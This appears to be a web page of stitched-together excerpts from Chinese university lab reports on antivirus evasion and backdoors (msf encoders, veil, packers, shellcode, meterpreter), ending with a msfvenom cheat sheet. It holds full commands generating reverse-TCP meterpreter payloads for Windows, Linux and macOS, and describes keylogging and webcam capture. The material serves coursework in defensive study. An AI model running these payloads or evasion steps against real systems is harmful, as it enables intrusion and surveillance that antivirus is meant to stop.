msfvenom

目录 1. 实践基础 1.1 什么是恶意代码检测机制和免杀原理？ 1.1.1 免杀原理 1.1.2 恶意代码检测机制 1.1.3 免杀技术综述 1.2 基础问题回答 2. 实践内容 2.1 学习正确使用msf编码器、msfvenom生成如jar之类的其他文件、veil、加壳工具、 使用C + shellcode编程以及课堂其他课堂为介绍方法 2.1.1 正确使用msf编码器，生成exe文件 2.1.2 msfvenom生成jar文件 2.1.3 msfvenom生成php文件 2.1.4 使用veil-evasion生成后门程序及检测 2.1.5 使用加壳工具尝试 2.1.6 使用C+shellcode编程 2.1.7 使用其他方法完成免杀 2.2 通过组合应用各种技术实现恶意代码免杀 2.3 用另一电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本 4.1.3 总结与体会 1. 实践基础 1.1 什么是恶意代码检测机制和免杀原理？ 1.1.1 免杀原理 免杀技术，全称为反杀毒技术(Anti Anti-Virus)，是指对恶意软件的处理让其能够不被杀毒软件所检测，同时也是渗透测试中需要使用到的技术。 1.1.2 恶意代码检测机制 基于特征码的检测： 简单来说一段特征码就是一段或多段数据。如果一个可执行文件（或其他运行的库、脚本等

2019-2020-2 《网络对抗技术》 Exp3 免杀原理与实践 一 . 知识小结 免杀概念 一般是对恶意软件做处理，让它不被杀毒软件所检测。 基础问题回答 杀软是如何检测出恶意代码的？ 基于特征码的检测 一段特征码就是一段或多段数据，经过对许多恶意代码的分析，我们发现了该类恶意代码经常出现的一段或多段代码，而且是其他正常程序没有的，即特征码。如果杀软检测到一个可执行文件包含特征码就认为其是恶意代码。 启发式恶意软件检测 就是根据些片面特征去推断。通常是因为缺乏精确判定依据。（非精确） 基于行为的恶意软件检测 为加入了行为监控的启发式。通过对恶意代码的观察研究，发现有一些行为是恶意代码共同的比较特殊的行为，杀软会监视程序的运行，如果发现了这些特殊行为，就会认为其是恶意软件。（非精确） 免杀是做什么？ 一般是对恶意软件做处理，让它不被杀毒软件所检测 免杀的基本方法有哪些？ 改变特征码 只有EXE— 加壳（压缩壳 加密壳） 有shellcode(像Meterpreter）—利用encode进行编码 有源代码——用其他语言进行重写再编译 改变行为 通讯方式 尽量使用反弹式连接：meterpreter本身即主要使用反弹连接 使用隧道技术：如dns2tcp、iodine可将流量封闭为DNS协议包 加密通讯数据：如使用reverse-https进行转发 操作模式 基于内存操作

2019-2020-2 网络对抗技术 20175214 Exp3 免杀原理与实践 一、预备知识 1.恶意代码检测机制 (1)基于特征码的检测 简单来说一段特征码就是一段或多段数据。如果一个可执行文件（或其他运行的库、脚本等）包含这样的数据则被认为是恶意代码。 (2)启发式恶意软件检测 “When I see a bird that walks like a duck and swims like a duck and quacks like a duck, I call that bird a duck.” 对恶意软件检测来说，就是如果一个软件在干通常是恶意软件干的事，看起来了像个恶意软件，那我们就把它当成一个恶意软件吧。典型的行为如连接恶意网站、开放端口、修改系统文件，典型的“外观”如文件本身签名、结构、厂商等信息等。各个厂商会定义自己的检测模式。 (3)基于行为的恶意软件检测 从理论上讲，基于行为的检测相当于是启发式的一种，或者是加入了行为监控的启发式。 2.免杀原理(AV) (1)改变特征码 有EXE 加壳：压缩壳 加密壳 有shellcode(像Meterpreter） 用encode进行编码 基于payload重新编译生成可执行文件 有源代码 用其他语言进行重写再编译（veil-evasion） (2)改变行为 通讯方式 尽量使用反弹式连接 使用隧道技术 加密通讯数据

目录 一、学习目标 二、基础问题回答 三、实验步骤 1、使用msf编码器msfvenom生成后门程序 2、使用Msfvenom生成jar等其他文件 用下面的命令生成php文件 3、Veil-Evasion 4、用shellcode编程生成后门程序 5、加壳 三、实验遇到的问题 1、装veil的时候，缺少Python3.4的包。 2、没有找到hyperion.exe程序。 四、实验感想 一、学习目标 (1)正确使用msf编码器（0.5分），msfvenom生成如jar之类的其他文件（0.5分），veil-evasion（0.5分），加壳工具（0.5分），使用shellcode编程（1分） (2)通过组合应用各种技术实现恶意代码免杀(0.5分) （如果成功实现了免杀的，简单语言描述原理，不要截图。与杀软共生的结果验证要截图。） (3)用另一电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本（加分0.5） 二、基础问题回答 1、杀软是如何检测出恶意代码的？ 基于特征码的检测：简单来说一段特征码就是一段或多段数据。如果一个可执行文件（或其他运行的库、脚本等）包含这样的数据则被认为是恶意代码。AV软件厂商要做的就是尽量搜集最全的、最新的特征码库。所以杀毒软件的更新很重要。过时的特征码库就是没有用的库。 启发式恶意软件检测：启发式Heuristic，简单来说

2019-2020-2 网络对抗技术 20175311胡济栋 Exp3 免杀原理与实践 目录 一、实验介绍 二、实验内容 任务一：学习正确使用msf编码器、msfvenom生成如jar之类的其他文件、veil、加壳工具、 使用C + shellcode编程以及课堂其他课堂为介绍方法(3分) 任务二：通过组合应用各种技术实现恶意代码免杀(0.5分) 任务三：用另一电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本(0.5分) 三、实验要求 四、实验感想 一、实验介绍 1.免杀原理 免杀技术，全称为反杀毒技术(Anti Anti-Virus)，是指对恶意软件的处理让其能够不被杀毒软件所检测，同时也是渗透测试中需要使用到的技术。 学习免杀就必须了解恶意软件检测工具是如何运作的，知己知彼，百战百胜。 2.恶意软件检测机制 基于特征码的检测 简单来说一段特征码就是一段或多段数据。如果一个可执行文件（或其他运行的库、脚本等）包含这样的数据则被认为是恶意代码。 AV软件厂商要做的就是尽量搜集最全的、最新的特征码库。所以杀毒软件的更新很重要。过时的特征码库就是没有用的库。 启发式恶意软件检测 启发式Heuristic，简单来说，就是根据些片面特征去推断，通常是因为缺乏精确判定依据。 对恶意软件检测来主说，就是如果一个软件在干通常是恶意软件干的事，看起来了像个恶意软件

2019-2020-2 20175320 《网络对抗技术》Exp3 后门原理与实践 一、实验要求 了解metasploit、veil、加壳工具的使用方法，并利用以上软件实现后门程序与杀软之间的共存，并利用后门程序获取被攻击方的shell。 二、实验目标 1、正确使用msf编码器 2、msfvenom生成如jar之类的其他文件 3、使用veil进行免杀处理 4、使用upx加压缩壳，hyperion加加密壳 5、使用C + shellcode编程进行免杀 6、使用python + shellcode进行免杀（使用其他课堂未介绍方法） 7、通过组合应用各种技术实现恶意代码免杀 8、用另一电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本 三、实验过程 1.准备工作 （1）安装veil 用 sudo apt-get install veil 命令安装veil，如果有问题可以尝试使用 sudo apt-get update 和 sudo apt-get upgrade 命令更新一下软件包。 安装完成后使用 veil 命令打开veil，输入Y继续安装直到完成。期间可能会因为网络问题下载中断，并且需要手动确认部分软件的安装，这一准备工作需要较长的时间。 （2）hyperion加密壳应用 由于我的kali系统里没有hyperion的文件夹

一、免杀原理及基础问题回答 1.免杀原理 2.基础问题回答 3.免杀效果评价 二、实验内容 任务一：正确使用msf编码器，msfvenom生成如jar之类的其他文件，veil-evasion，自己利用shellcode编程等免杀工具或技巧 使用msf编码器生成各种后门程序及检测 使用veil-evasion生成后门程序及检测 半手工注入Shellcode并执行 使用其他课程未介绍的方法 任务二：通过组合应用各种技术实现恶意代码免杀 任务三：用另一电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本 三、开启杀软能绝对防止电脑中恶意代码吗？ 四、实验总结与体会 一、免杀原理及基础问题回答 1.免杀原理 一般是对恶意软件做处理，让它不被杀毒软件所检测。也是渗透测试中需要使用到的技术。 要做好免杀，就时清楚杀毒软件（恶意软件检测工具）是如何工作的。AV(Anti-virus)是很大一个产业。其中主要的技术人员基本有编制恶意软件的经验。 反过来也一样，了解了免杀的工具和技术，你也就具有了反制它的基础。 2.基础问题回答 杀软是如何检测出恶意代码的？ 基于特征码的检测：简单来说一段特征码就是一段或多段数据，经过对许多恶意代码的分析，我们发现了该类恶意代码经常出现的一段或多段代码，而且是其他正常程序没有的，即特征码。如果杀软检测到一个可执行文件包含特征码就认为其是恶意代码。

0.实验准备 1.实践内容（4分） 1.1 方法（3分） - 正确使用msf编码器 （0.5分）， - msfvenom生成如jar之类的其他文件 （0.5分）， - veil （0.5分）， - 加壳工具 （0.5分）， - 使用C + shellcode编程 （0.5分）， - 使用其他课堂未介绍方法 （0.5分） 1.2 通过组合应用各种技术实现恶意代码免杀 (0.5分) （如果成功实现了免杀的，简单语言描述原理，不要截图。与杀软共生的结果验证要截图。） 1.3 用另一电脑实测，在杀软开启的情况下，可运行并回连成功，注明电脑的杀软名称与版本 （加分0.5） 2. 基础问题回答 （1）杀软是如何检测出恶意代码的？ （2）免杀是做什么？ （3）免杀的基本方法有哪些？ （4）开启杀软能绝对防止电脑中恶意代码吗？ 3. 实验感想 实验准备 1.免杀 一般是对恶意软件做处理，让它不被杀毒软件所检测。也是渗透测试中需要使用到的技术。 要做好免杀，就时清楚杀毒软件（恶意软件检测工具）是如何工作的。AV(Anti-virus)是很大一个产业。其中主要的技术人员基本有编制恶意软件的经验。 反过来也一样，了解了免杀的工具和技术，你也就具有了反制它的基础 。 2.免杀技术(Evading AV)综述 就常见恶意软件而言，一般AV的检出率为40%-98%。就算你用了最好的AV，恶意软件依然有1

一、实验目标 清楚后门概念 会用nc获取远程主机的Shell 会用meterpreter 会启动后门 二、实验内容 使用netcat获取主机操作Shell，cron启动 使用socat获取主机操作Shell, 任务计划启动 使用MSF meterpreter（或其他软件）生成可执行文件，利用ncat或socat传送到主机并运行获取主机Shell 使用MSF meterpreter（或其他软件）生成获取目标主机音频、摄像头、击键记录等内容，并尝试提权 可选加分内容：使用MSF生成shellcode,注入到实践1中的pwn1中，获取反弹连接Shell 三、基础问题回答 例举你能想到的一个后门进入到你系统中的可能方式？ 当捡到一个U盘时，会尝试着插入自己的电脑，当U盘插入后后门可能进入系统 当下载一个软件时，后门可能同时被安装在你的系统中了 当你在网页上点击一个按钮时，后门可能会被安装在你的电脑里 例举你知道的后门如何启动起来(win及linux)的方式？ 在开机的时候自启动（Windows注册表） 被设置了定时启动（Linux的crontab） 作为服务启动 被其他主机控制，从而启动 Meterpreter有哪些给你映像深刻的功能？ 除了本次实验中完成的获取被控主机的录音、录像、截图、键盘输入记录等功能，还有从被控主机上对相关的文件进行下载和上传，远程操控目标机上的程序运行等功能。

二进制 windows msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -a x86 --platform Windows -f exe > shell.exe msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -f exe > shell.exe windows下生成32位/64位payload时需要注意：以windows/meterpreter/reverse_tcp为例，该payload默认为32位，也可使用-a x86选项指定。如果要生成64位，则payload为windows/x64/meterpreter/reverse_tcp。 Linux msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -a x86 --platform Linux -f elf > shell.elf Mac msfvenom -p osx/x86/shell_reverse_tcp LHOST=10.211.55.2 LPORT=3333 -a x86 --platform osx -f